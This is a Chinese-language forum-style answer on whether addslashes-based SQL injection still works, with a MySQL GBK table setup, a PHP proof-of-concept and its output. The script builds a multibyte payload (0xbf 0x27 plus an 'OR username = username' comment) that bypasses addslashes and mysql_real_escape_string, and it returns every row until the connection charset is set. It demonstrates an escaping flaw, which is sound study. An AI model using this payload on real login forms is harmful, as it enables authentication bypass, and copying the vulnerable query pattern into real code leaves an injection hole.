php addslashes sql注入仍然有效吗？

看来对我有用。

MySQL的：

mysql> select version();+---------------------+| version()|+---------------------+| 5.0.45-community-nt |+---------------------+1 row in set (0.00 sec)mysql> CREATE TABLE users (    ->     username VARCHAr(32) CHARACTER SET GBK,    ->     password VARCHAr(32) CHARACTER SET GBK,    ->     PRIMARY KEY (username)    -> );Query OK, 0 rows affected (0.08 sec)mysql> insert into users SET username='ewrfg', password='wer44';Query OK, 1 row affected (0.02 sec)mysql> insert into users SET username='ewrfg2', password='wer443';Query OK, 1 row affected (0.03 sec)mysql> insert into users SET username='ewrfg4', password='wer4434';Query OK, 1 row affected (0.00 sec)

PHP：

<pre><?phpecho "PHP version: ".PHP_VERSION."n";mysql_connect();mysql_select_db("test");mysql_query("SET NAMES GBK");$_POST['username'] = chr(0xbf).chr(0x27).' OR username = username /*';$_POST['password'] = 'guess';$username = addslashes($_POST['username']);$password = addslashes($_POST['password']);$sql = "SELECT * FROM  users WHERe  username = '$username' AND password = '$password'";$result = mysql_query($sql) or trigger_error(mysql_error().$sql);var_dump($username);var_dump(mysql_num_rows($result));var_dump(mysql_client_encoding());$username = mysql_real_escape_string($_POST['username']);$password = mysql_real_escape_string($_POST['password']);$sql = "SELECt * FROM  users WHERe  username = '$username' AND password = '$password'";$result = mysql_query($sql) or trigger_error(mysql_error().$sql);var_dump($username);var_dump(mysql_num_rows($result));var_dump(mysql_client_encoding());mysql_set_charset("GBK");$username = mysql_real_escape_string($_POST['username']);$password = mysql_real_escape_string($_POST['password']);$sql = "SELECt * FROM  users WHERe  username = '$username' AND password = '$password'";$result = mysql_query($sql) or trigger_error(mysql_error().$sql);var_dump($username);var_dump(mysql_num_rows($result));var_dump(mysql_client_encoding());

结果：

PHP version: 5.3.3string(29) "ї' OR username = username /*"int(3)string(6) "latin1"string(29) "ї' OR username = username /*"int(3)string(6) "latin1"string(30) "ї' OR username = username /*"int(0)string(3) "gbk"

结论：

对于那些高喊“您应该使用mres而不是加号！”的人来说，第二个结果将是最令人惊讶的。